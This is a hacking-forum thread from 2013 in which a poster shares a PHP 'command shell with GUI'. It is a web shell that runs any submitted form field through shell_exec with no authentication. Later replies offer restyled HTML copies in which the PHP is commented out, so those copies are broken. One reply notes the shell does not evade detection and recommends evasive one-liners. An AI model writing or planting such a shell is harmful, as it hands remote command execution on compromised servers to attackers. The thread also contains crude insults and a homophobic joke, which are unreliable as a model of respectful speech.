Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Command shell with GUI. filter_list
Author
Message
Command shell with GUI. #1
I was bored, so I made a command shell that has a GUI, 100 percent leeched HTML.
Here is a screenshot.
[Image: d0a7a91ea1.png]

1337 scrolling text.

Code.
Spoiler:
PHP Code:
<?php function exec_cmd(){ if (isset($_POST['command'])){ $exc = $_POST['command']; echo shell_exec($exc); } } ?> <form action='<?php echo $_SERVER["PHP_SELF"]?>' method='post'> <input type= 'text' name='command' /> <input type='submit' /> </form> <?php exec_cmd();?> <marquee behavior="slide" direction="left">Kirito's command shell. - Sinister.ly</marquee>

Reply

RE: Command shell with GUI. #2
I love the 1337 scrolling text, obviously the best thing about the whole project!

just kidding, all of it's good.

good job, Kirito.

you did a good job.

banana stickur 4 u
[Image: tenor.gif]

🍫  🍬 🎀

Reply

RE: Command shell with GUI. #3
noob ass script. All it needed was the scrolling text and that would do everything and shit. fucking skid, ruining scrolly text damnit. d0 U 3\/3n 1337 |3r0?

Reply

RE: Command shell with GUI. #4
(06-28-2013, 03:24 AM)Sinisterkid Wrote: noob ass script. All it needed was the scrolling text and that would do everything and shit. fucking skid, ruining scrolly text damnit. d0 U 3\/3n 1337 |3r0?

Um, what?

Reply

RE: Command shell with GUI. #5
(06-28-2013, 03:46 AM)Kirito Wrote: Um, what?

I was just being a skid flamer, that's all. But I like this, I might change the colors a bit though. Black and gray are easier on the eyes.

Reply

RE: Command shell with GUI. #6
(06-28-2013, 04:16 AM)Sinisterkid Wrote: I was just being a skid flamer, that's all. But I like this, I might change the colors a bit though. Black and gray are easier on the eyes.

If you do i'll add your edition to the OP. Smile

Reply

RE: Command shell with GUI. #7
I saw that layout on HF, must be skidded!

Reply

RE: Command shell with GUI. #8
(06-28-2013, 04:22 AM)Dogs Toy Wrote: I saw that layout on HF, must be skidded!

Implying I'm not perma banned on HF.

Quote:100 percent leeched HTML.

Because that wasn't in the OP, or anything.

Reply

RE: Command shell with GUI. #9
Style: Darkness
Code:
<html> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <title>Command Shell</title> </head> <body alink="#cc0000" bgcolor="#111" link="#cc0000" text="#cccccc" vlink="#cc0000"> <!--?php function exec_cmd(){ if (isset($_POST['command'])){ $exc = $_POST['command']; echo shell_exec($exc); } } ?--> <p align="center"><img alt="" src="http://cdn.sinister.ly/images/e-red/logo.png" height="84" width="384"><br> ~Kirito's Command Shell~<br> </p> <form action="&lt;?php echo $_SERVER[&quot;PHP_SELF&quot;]?&gt;" method="post"> <input size="45" name="command"> <input type="submit"> </form> <!--?php exec_cmd();?--><marquee behavior="slide" direction="right" speed="20"><font color="#999999">Modded for looks by SinisterKid (http://www.succubustorrents.net)</font></marquee> </body> </html>
Style: Skiddy
Code:
<html> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <title>Command Shell</title> </head> <body alink="#cc0000" bgcolor="#111" link="#cc0000" text="#33ff33" vlink="#cc0000"> <!--?php function exec_cmd(){ if (isset($_POST['command'])){ $exc = $_POST['command']; echo shell_exec($exc); } } ?--> <p align="center"><img alt="" src="http://cdn.sinister.ly/images/e-red/logo.png" height="84" width="384"><br> &nbsp; <marquee>0101010101~Kirito's C0mm4nd Sh3ll~ 0101010101 </marquee> </p> <form action="&lt;?php echo $_SERVER[&quot;PHP_SELF&quot;]?&gt;" method="post"> <input size="45" name="command"> <input type="submit"> </form> <!--?php exec_cmd();?--><marquee behavior="slide" direction="right" speed="20"><font color="#999999">Modded for looks by SinisterKid (http://www.succubustorrents.net)<br> </font></marquee> <br> <br> <marquee>YOU CAN'T SPELL SKID WITHOUT "<font color="#ff0000">H</font><font color="#cc33cc">A</font> <font color="#3333ff">G</font><font color="#ffff00">A</font><font color="#ff6600">Y</font>!"<br> </marquee> </body> </html>
Did I break it?

Reply

RE: Command shell with GUI. #10
Lol..this won't let you evade jack shit, I guess it's 'okay' for a basic webshell..1 liners that evade are nicer or just shells that evade, etc.

Reply